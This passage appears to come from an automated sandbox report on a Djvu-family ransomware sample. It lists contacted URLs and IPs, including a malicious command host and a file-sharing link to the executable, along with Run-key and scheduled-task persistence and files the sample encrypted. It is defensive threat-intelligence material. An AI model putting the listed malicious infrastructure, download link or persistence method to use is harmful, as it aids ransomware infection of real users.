                                                    https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27mU2p71KMss.exe, 00000007.00000003.2089780619.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000764000.00000004.00000020.00020000.00000000.sdmp, _README.txt.7.dr, _README.txt0.7.drfalse
                                                      		high
                                                      https://api.2ip.ua/geo.jsonSfmU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.2ip.ua/geo.jsonsmU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.2ip.ua/geo.jsonMmU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.2ip.ua/geo.jsons:$mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.wikipedia.com/mU2p71KMss.exe, 00000007.00000003.2095426359.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.2ip.ua/.mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.2ip.ua/geo.json.7mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.live.com/mU2p71KMss.exe, 00000007.00000003.2095187541.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.2ip.ua/2mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.reddit.com/mU2p71KMss.exe, 00000007.00000003.2095309712.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.google.com/mU2p71KMss.exe, 00000007.00000003.2095130817.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.2ip.ua/geo.jsonqSmU2p71KMss.exe, 00000005.00000002.2025045423.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            62.150.232.50
                                                                            		cajgtus.comKuwait
                                                                            		9155QNETKuwaitKWtrue
                                                                            104.21.65.24
                                                                            		api.2ip.uaUnited States
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                            Analysis ID:1431118
                                                                            Start date and time:2024-04-24 15:56:06 +02:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 15s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:mU2p71KMss.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:e9ff14a975f084f01373d468c0b91a16.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.rans.troj.evad.winEXE@18/287@4/2
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 94%
                                                                            • Number of executed functions: 28
                                                                            • Number of non-executed functions: 245
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • VT rate limit hit for: mU2p71KMss.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            15:56:53Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe s>--Task
                                                                            15:56:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
                                                                            15:57:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            62.150.232.50wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                            • sajdfue.com/files/1/build3.exe
                                                                            104.21.65.24sIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                              qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                  UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                    mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                      2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                                                                                        CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                          SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                            WAhYftpepO.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                              6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                cajgtus.comsIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 63.143.98.185
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.232.19.193
                                                                                                Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.163.142.13
                                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.232.19.193
                                                                                                rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 200.45.93.45
                                                                                                8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 85.11.159.22
                                                                                                UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 189.245.19.217
                                                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 81.183.132.103
                                                                                                mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 58.151.148.90
                                                                                                JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 211.181.24.132
                                                                                                api.2ip.uasIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                • 172.67.139.220
                                                                                                UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                • 172.67.139.220
                                                                                                mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 172.67.139.220

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                CLOUDFLARENETUShttp://gnoticiasimparciais.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.22.20.226
                                                                                                FW_ FHAS Inc_ - Private and Confidential.msgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 104.17.2.184
                                                                                                https://insidesales-email.com/l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.67.203.167
                                                                                                Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 104.26.13.205
                                                                                                https://campaign-statistics.com/link_click/PJygYHTMZ2_OXDfP/30633247af9f78d20f1e067eab9a8276Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 172.66.40.88
                                                                                                sIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                http://crunchersflowdigital.comGet hashmaliciousUnknownBrowse
                                                                                                • 104.18.70.113
                                                                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                • 104.26.5.15
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                https://0_kid43983.inibara.eu/Get hashmaliciousUnknownBrowse
                                                                                                • 104.21.34.12
                                                                                                QNETKuwaitKW2EFEN3j6ml.elfGet hashmaliciousUnknownBrowse
                                                                                                • 94.29.162.108
                                                                                                tWpGuzQQoW.elfGet hashmaliciousMiraiBrowse
                                                                                                • 94.29.194.1
                                                                                                g6W1NW8Q8t.elfGet hashmaliciousUnknownBrowse
                                                                                                • 62.150.37.222
                                                                                                UN8chkjVtu.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.37.241
                                                                                                wn1gncGy2T.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                                                                • 62.150.232.50
                                                                                                I9DNQsrT8I.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                • 94.29.162.165
                                                                                                skid.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 62.150.212.202
                                                                                                E6l0C6FObI.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.245.4
                                                                                                9Y3FJARAlg.elfGet hashmaliciousMiraiBrowse
                                                                                                • 62.150.242.100
                                                                                                NCP3E3pc1H.elfGet hashmaliciousMiraiBrowse
                                                                                                • 94.29.180.166

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • 104.21.65.24
                                                                                                SecuriteInfo.com.Program.Unwanted.5215.4772.1835.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                • 104.21.65.24
                                                                                                sIQywRNC5M.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                • 104.21.65.24
                                                                                                qJKiVKZdFk.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                • 104.21.65.24
                                                                                                BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 104.21.65.24
                                                                                                Z4CYGTBlj7.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                • 104.21.65.24
                                                                                                IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.65.24
                                                                                                IPrstVM17M.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.65.24

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\SystemID\PersonalID.txt

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):42
                                                                                                Entropy (8bit):4.927798970294787
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:fXA/yTcBMKqj:fXEyT5K0
                                                                                                MD5:4E7AA56344C4F657EFA4ABA820D9BFF4
                                                                                                SHA1:D1B1622A05D8A54BE43530EA69F95C6F8EBE75C5
                                                                                                SHA-256:9FCCDBDC4092CB6ECD26D9534A25052E2018516022315DB0A8913D841C2FAC7F
                                                                                                SHA-512:7E2D14976E3D19A9D4C89775F4F4DE032199491D1ED6BE9C3AA0238A6B53F9E4C62EEFCFC8096A7A77BA5CD5856940158716F9A3D1D3710A52FA64649CB0B2E3
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE..

                                                                                                C:\Users\user\.curlrc

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):342
                                                                                                Entropy (8bit):7.273377032657987
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:KWbbCDFa/wF0GhS/HT7mCznz/rzox4AavWfn/LXySL38W7UNCqeHXEyT5KITsciD:Nb2Za/wF02S/H3mQz/xKhD7UNcHXEyt2
                                                                                                MD5:606F65DD9F97FE26FB604BBB22BC5A72
                                                                                                SHA1:24985C1842876C2D5E9F720C618BD9CCEF3AC68D
                                                                                                SHA-256:B44066CF8A85E7C27D52DCB42815C6EA54DFF7B35CF64724A3CB1C2DD1BA2189
                                                                                                SHA-512:CADC91F6588D751DAFB1CF9A5472DCBBE6850647C861B6873CC41AAC1AA07A8401B96CF5B164C7E4B5D8636318E645F5E0A570A0E60C80F76D9BC67796EDB4E7
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:insec.f....]0.. ..oG.............,[...o..]...m.(J...@..7.0..#........C....d....k....+..w..k.Iw.".......J.W$..A...%....2.3....s..B.S=....F.:..S..NU##.X.....wzl...K........,X....J8:..)...2).n..e!......S.....Y.s.^E.......p".P......d..'...8........8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\.curlrc.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):342
                                                                                                Entropy (8bit):7.273377032657987
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:KWbbCDFa/wF0GhS/HT7mCznz/rzox4AavWfn/LXySL38W7UNCqeHXEyT5KITsciD:Nb2Za/wF02S/H3mQz/xKhD7UNcHXEyt2
                                                                                                MD5:606F65DD9F97FE26FB604BBB22BC5A72
                                                                                                SHA1:24985C1842876C2D5E9F720C618BD9CCEF3AC68D
                                                                                                SHA-256:B44066CF8A85E7C27D52DCB42815C6EA54DFF7B35CF64724A3CB1C2DD1BA2189
                                                                                                SHA-512:CADC91F6588D751DAFB1CF9A5472DCBBE6850647C861B6873CC41AAC1AA07A8401B96CF5B164C7E4B5D8636318E645F5E0A570A0E60C80F76D9BC67796EDB4E7
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:insec.f....]0.. ..oG.............,[...o..]...m.(J...@..7.0..#........C....d....k....+..w..k.Iw.".......J.W$..A...%....2.3....s..B.S=....F.:..S..NU##.X.....wzl...K........,X....J8:..)...2).n..e!......S.....Y.s.^E.......p".P......d..'...8........8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):628
                                                                                                Entropy (8bit):7.585823008457998
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kE9teTWRRCmlHwdoRVnZhov3R3hY3PWOSXEytzIcii9a:pteCR4+wKlov3RhdOSXfzIbD
                                                                                                MD5:5A3E5F8A53CE08199443525BEECB05CA
                                                                                                SHA1:7EB890032EE7C30B7D10F9C127B5F77033F0EA13
                                                                                                SHA-256:88A87D4869963B346246892E2D03B7588803C54A347C75D3E4E0F7439325D6FE
                                                                                                SHA-512:9CCA61C53AD244EB9FCB5996449E886518248AAA89DBC619627474B81CB96561E8E6E04C35C285189C4A744A9C455CE479BE0E9BBCB4C90DE50DC874A05FF748
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.H....Z...../.46./=.8.7......5.u.....`.W.X....d..0......p..X.n.M....++..TV...}.P\f.kJ.d...|c{I.......Q.#p.6...5....Z....&.#......Id`m..}~z.Y..Nm.p..G..;U..URW<...P.....O.r(..@(.n...LE5..........6m...w_..k.D.Q..u._.J.\.K4f:..T.:....5R...f......|.d_!... ..3....1..Uw?....u.;.Y......'K....3..~#..9...,.z........y..o..=...-w.F..yQ...x+!..r.8.(wP.<.IiU..K....2|xg\X;... ^n;.x....L'A....J.UW8~.F.%.q.z.C x..vo..... ...UDa.{....).qu}.. -.:..o....H.8.F(..5....e.Qt..\.BQ.h.......E..............}......28.bl.r.....C.y4.q`..l..r8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):628
                                                                                                Entropy (8bit):7.585823008457998
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kE9teTWRRCmlHwdoRVnZhov3R3hY3PWOSXEytzIcii9a:pteCR4+wKlov3RhdOSXfzIbD
                                                                                                MD5:5A3E5F8A53CE08199443525BEECB05CA
                                                                                                SHA1:7EB890032EE7C30B7D10F9C127B5F77033F0EA13
                                                                                                SHA-256:88A87D4869963B346246892E2D03B7588803C54A347C75D3E4E0F7439325D6FE
                                                                                                SHA-512:9CCA61C53AD244EB9FCB5996449E886518248AAA89DBC619627474B81CB96561E8E6E04C35C285189C4A744A9C455CE479BE0E9BBCB4C90DE50DC874A05FF748
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.H....Z...../.46./=.8.7......5.u.....`.W.X....d..0......p..X.n.M....++..TV...}.P\f.kJ.d...|c{I.......Q.#p.6...5....Z....&.#......Id`m..}~z.Y..Nm.p..G..;U..URW<...P.....O.r(..@(.n...LE5..........6m...w_..k.D.Q..u._.J.\.K4f:..T.:....5R...f......|.d_!... ..3....1..Uw?....u.;.Y......'K....3..~#..9...,.z........y..o..=...-w.F..yQ...x+!..r.8.(wP.<.IiU..K....2|xg\X;... ^n;.x....L'A....J.UW8~.F.%.q.z.C x..vo..... ...UDa.{....).qu}.. -.:..o....H.8.F(..5....e.Qt..\.BQ.h.......E..............}......28.bl.r.....C.y4.q`..l..r8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):669
                                                                                                Entropy (8bit):7.714157400381269
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLi6qnjvfXALrux8Jk03J8QdotcASdTuYyIx5qMYdYbzzfQlkP6BKLLTSXEytzIX:B6yvfQPzm03DWc2YVXqzY7EBXfzIbD
                                                                                                MD5:4717A53D6460AA7D70471D7C0D3A9E37
                                                                                                SHA1:3A75B1386AB1A7F799F9BF6788D7F26A45EB9420
                                                                                                SHA-256:2962A8DEA51658DE68F971FF9BF899B6D0E9B4B20F60364FB2ED96865445D82F
                                                                                                SHA-512:DC71E319481432FB8ABFF0FE3EB6A2307A93E3FA66901F4A4DD021218E614289793C4FDFBEF9D77B0E59D2053287B1BFE0261098998C4800FABCF1FAE7F02715
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.8.tn.3.N["...ih.y.X].."h..i....}.....y./......E.7#.{..YbCf..-y.}@....g`...,..1.TY...M..j..^.....$.....++|.q..R'.'[K.&...P.hx.J..p..d..f.{.%..z.)!<7XR..h..1..C..[i..Fr...u.+......&....u..."..Z[Ee.\.......Y.K.(.....7..`.^....Z..a._s......um..]..8.a$21.:.1n.H(...N......F.ZP.sD..?.7.r....k..1.*.;...r5d..>......@y'X.(.5..M3`.A..mj.-T..o..Y....@.Y:.U..F.?..HN.<.'.p.0........4\`'..E.......o.\..u.&.k..z...1........].;.~..T>........ .eI1r1%.d.s....$.RnK.X.N.l...Z....Y..#......v.+.3.I.M.n..f.r...!.:.|~..@!...@..4...x.nT......>...F......l........Q(.}G.X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):669
                                                                                                Entropy (8bit):7.714157400381269
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:kLi6qnjvfXALrux8Jk03J8QdotcASdTuYyIx5qMYdYbzzfQlkP6BKLLTSXEytzIX:B6yvfQPzm03DWc2YVXqzY7EBXfzIbD
                                                                                                MD5:4717A53D6460AA7D70471D7C0D3A9E37
                                                                                                SHA1:3A75B1386AB1A7F799F9BF6788D7F26A45EB9420
                                                                                                SHA-256:2962A8DEA51658DE68F971FF9BF899B6D0E9B4B20F60364FB2ED96865445D82F
                                                                                                SHA-512:DC71E319481432FB8ABFF0FE3EB6A2307A93E3FA66901F4A4DD021218E614289793C4FDFBEF9D77B0E59D2053287B1BFE0261098998C4800FABCF1FAE7F02715
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:2023/.8.tn.3.N["...ih.y.X].."h..i....}.....y./......E.7#.{..YbCf..-y.}@....g`...,..1.TY...M..j..^.....$.....++|.q..R'.'[K.&...P.hx.J..p..d..f.{.%..z.)!<7XR..h..1..C..[i..Fr...u.+......&....u..."..Z[Ee.\.......Y.K.(.....7..`.^....Z..a._s......um..]..8.a$21.:.1n.H(...N......F.ZP.sD..?.7.r....k..1.*.;...r5d..>......@y'X.(.5..M3`.A..mj.-T..o..Y....@.Y:.U..F.?..HN.<.'.p.0........4\`'..E.......o.\..u.&.k..z...1........].;.~..T>........ .eI1r1%.d.s....$.RnK.X.N.l...Z....Y..#......v.+.3.I.M.n..f.r...!.:.|~..@!...@..4...x.nT......>...F......l........Q(.}G.X8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):818
                                                                                                Entropy (8bit):7.732193557220087
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YKWML5wbOUJQL43AV3nzza0e3Pto1AmBVXfzIbD:YE5YV3AV3K0e1fmB9fzSD
                                                                                                MD5:4347EDC200ED8AF202189A0A83B45D88
                                                                                                SHA1:92D19EC0B5E429CB5DE7A2461EFEE669A4AE8A1D
                                                                                                SHA-256:258ED6CAA4EC55AB992715BAA6B641FD523E2DBE042EFB35BCBFF26AA7970EBC
                                                                                                SHA-512:41FCC722BAF329810C882D7CD578AC14D24611A96C2C33931F05E1112633304B4E14D79E201C8F2143018E2892006B22B20C0720186E176E6DC36E54106F3354
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:{"os_.iq..Pc.z.....q...h.b.D..W-/.x.s...[..k;....`..#HE.).,v(.S......o.........#...RF.5fK........-..!.".J.)..<B.f.~.D<...+.C............s.XF..x?..7..c...Q.kcS|.....y.\.7z.r.C....-.......8-9G./.cP.]%..2.~tM.g......."..X.r........t.e....]......!......8y..[f.4..eYX..;M.F..%.|b.`.H.;.|...!..ys.p27P(9.......aR#.;L.2....^..........}d.D^...|.....`x.......wa... ...<1K.........E]-CN...I.V+r.K.e..o..^..''...1..z.m....<.3...-R..?...!.....ny)..d.}..<.....~..e.;=l..h..&..f..J|l..Lr O...r.M.."!+..V.c.$.D-.}558V... ....X..%.Y..5...E..k`.v.V......./..jf..@......m.t.?..8..`Y..Q-..y.cw.C.}.7Q.y(.?d..z...P.......x..q.Q.q>...&...I.!..)on...<.Mo......o....tM..o..5.....:..6}h`0..9P..-]..c.Ud&.d.S.y].}....c..jF.......D8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):818
                                                                                                Entropy (8bit):7.732193557220087
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:YKWML5wbOUJQL43AV3nzza0e3Pto1AmBVXfzIbD:YE5YV3AV3K0e1fmB9fzSD
                                                                                                MD5:4347EDC200ED8AF202189A0A83B45D88
                                                                                                SHA1:92D19EC0B5E429CB5DE7A2461EFEE669A4AE8A1D
                                                                                                SHA-256:258ED6CAA4EC55AB992715BAA6B641FD523E2DBE042EFB35BCBFF26AA7970EBC
